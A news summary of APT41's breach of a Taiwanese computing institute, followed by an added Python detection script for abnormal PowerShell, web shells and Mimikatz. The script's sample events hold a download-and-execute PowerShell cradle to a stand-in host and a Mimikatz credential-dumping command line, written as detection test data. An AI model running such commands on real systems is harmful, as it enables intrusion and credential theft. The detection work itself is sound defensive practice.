APT41 Hackers Use ShadowPad, Cobalt Strike in Taiwanese Institute Cyber Attack

August 2, 2024 at 12:42PM

A Taiwanese research institute specializing in computing was breached by China-affiliated threat actors who delivered backdoors and malware such as ShadowPad and Cobalt Strike. Cisco Talos discovered the activity in August 2023 and attributed it to APT41. The attackers used various techniques to evade detection and exfiltrated documents from the network. This follows similar cyber attacks by Chinese state actors in other countries.

Key takeaways from the article:

– A Taiwanese government-affiliated research institute specializing in computing and associated technologies was breached by nation-state threat actors with ties to China.
– Security researchers from Cisco Talos identified the attack in August 2023.
– The threat actors used a variety of backdoors and post-compromise tools, including ShadowPad and Cobalt Strike.
– The attackers were able to compromise three hosts in the targeted environment and exfiltrate some documents from the network.
– The attack involved the use of an outdated, vulnerable version of a Microsoft Office IME binary as a loader, abnormal PowerShell commands, web shells, and other techniques to maintain persistent access and drop additional payloads.
– The attackers also utilized Mimikatz to extract passwords and executed several commands to gather information on user accounts, directory structure, and network configurations.
– Germany recently accused Chinese state actors of a 2021 cyber attack on its national mapping agency for espionage purposes, to which China’s embassy in Berlin responded by calling the accusation unfounded.
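The defensive side of the behaviours listed above (abnormal PowerShell, web shells, Mimikatz, and a legitimate but outdated binary acting as a loader), as an added Python example that is not from the article or from Cisco Talos: it triages constructed Sysmon-style process-creation events with one rule per behaviour. The event shape, the rule names, the sample telemetry and the file name `legacy_ime_placeholder.exe` are assumptions; the article does not name the IME binary, so a defender would substitute whatever legacy binary their own inventory flags.

```python
"""Triage constructed Windows process-creation events for the behaviours the
article lists: abnormal PowerShell, web shells, Mimikatz use and an outdated
binary acting as a loader. Added example, not code from Cisco Talos or the
article; the IME binary name below is a placeholder."""
import base64
import re

# Placeholder: the article does not name the outdated Office IME binary.
LEGACY_LOADER_BINARIES = {"legacy_ime_placeholder.exe"}
WEB_SERVER_PROCESSES = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\public\\")
# Mimikatz module prefixes appear verbatim in its command lines.
CREDENTIAL_DUMP_MARKERS = ("sekurlsa::", "lsadump::", "mimikatz")
DOWNLOAD_CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest", "invoke-expression")

ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ALIAS_RE = re.compile(r"\b(?:iex|iwr)\b", re.I)


def basename(path: str) -> str:
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return (event_index, rule, detail) findings for a list of events.

    Each event is a dict with 'image', 'parent_image' and 'command_line'
    (assumed shape, modelled loosely on Sysmon event ID 1)."""
    findings = []
    for i, ev in enumerate(events):
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["command_line"]
        lowered = cmd.lower()

        # 1. Abnormal PowerShell: encoded payload, hidden window, download cradle.
        if image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cmd)
            body = (decoded or cmd).lower()
            reasons = []
            if decoded is not None:
                reasons.append("encoded command")
            if HIDDEN_RE.search(cmd):
                reasons.append("hidden window")
            if any(c in body for c in DOWNLOAD_CRADLES) or ALIAS_RE.search(body):
                reasons.append("download cradle")
            if reasons:
                findings.append((i, "abnormal_powershell", ", ".join(reasons)))

        # 2. Web shell: the web server worker process spawning a shell.
        if parent in WEB_SERVER_PROCESSES and image in SHELLS:
            findings.append((i, "webshell_child_process", f"{parent} -> {image}"))

        # 3. Credential dumping: Mimikatz module syntax or binary name.
        if any(m in lowered or m in image for m in CREDENTIAL_DUMP_MARKERS):
            findings.append((i, "credential_dumping", "Mimikatz indicator"))

        # 4. Legacy binary as loader: the flagged binary running from a
        #    user-writable directory, or any process it spawns.
        image_path = ev["image"].lower()
        if image in LEGACY_LOADER_BINARIES and any(d in image_path for d in USER_WRITABLE):
            findings.append((i, "legacy_binary_as_loader", "runs from user-writable path"))
        if parent in LEGACY_LOADER_BINARIES:
            findings.append((i, "legacy_binary_as_loader", f"spawned {image}"))
    return findings


# Constructed sample telemetry (not from the incident); the encoded payload is
# built here so the example runs offline.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": "cmd.exe /c whoami /all"},
    {"image": r"C:\Users\Public\mk.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"image": r"C:\Users\Public\legacy_ime_placeholder.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "legacy_ime_placeholder.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\inventory.ps1"},  # benign
]

if __name__ == "__main__":
    for idx, rule, detail in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} ({detail})")
```

The last sample event is a routine scheduled script and produces no finding, which is the point of checking for specific abuse signals (encoding, hidden windows, cradles, shell-from-web-server) rather than alerting on every PowerShell launch. Decoding the `-EncodedCommand` payload before matching matters because the cradle strings never appear in the raw command line.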
